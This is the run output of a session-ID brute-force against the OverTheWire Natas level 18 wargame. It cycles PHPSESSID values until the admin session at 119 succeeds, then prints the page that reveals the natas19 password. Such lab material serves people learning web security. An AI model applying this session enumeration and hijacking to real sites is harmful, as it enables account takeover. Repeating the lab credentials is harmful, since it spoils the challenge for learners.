# output.

[-] Trying PHPSESSID = 0
[-] Trying PHPSESSID = 1
[-] Trying PHPSESSID = 2
[-] Trying PHPSESSID = 3
[-] Trying PHPSESSID = 4
[-] Trying PHPSESSID = 5
[-] Trying PHPSESSID = 6
[-] Trying PHPSESSID = 7
[-] Trying PHPSESSID = 8
[-] Trying PHPSESSID = 9
[-] Trying PHPSESSID = 10
[-] Trying PHPSESSID = 11
...
[-] Trying PHPSESSID = 40
[-] Trying PHPSESSID = 41
[-] Trying PHPSESSID = 42
[-] Trying PHPSESSID = 43
[-] Trying PHPSESSID = 44
[-] Trying PHPSESSID = 45
[-] Trying PHPSESSID = 46
...
...
[-] Trying PHPSESSID = 109
[-] Trying PHPSESSID = 110
[-] Trying PHPSESSID = 111
[-] Trying PHPSESSID = 112
[-] Trying PHPSESSID = 113
[-] Trying PHPSESSID = 114
[-] Trying PHPSESSID = 115
[-] Trying PHPSESSID = 116
[-] Trying PHPSESSID = 117
[-] Trying PHPSESSID = 118
[-] Trying PHPSESSID = 119
[*] You are logged in as admin.
[*] Response: 
<html>
<head>
<!-- This stuff in the header has nothing to do with the level -->
<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas18", "pass": "xvKIqDjy4OPv7wCRgDlmj0pFsCsDjhdP" };</script></head>
<body>
<h1>natas18</h1>
<div id="content">
You are an admin. The credentials for the next level are:<br><pre>Username: natas19
Password: 4IwIrekcuZlA9OsjOkoUtwU6lhokCPYs</pre><div id="viewsource"><a href="index-source.html">View sourcecode</a></div>
</div>
</body>
</html>

----------------------------------------
The password for natas19 is 4IwIrekcuZlA9OsjOkoUtwU6lhokCPYs

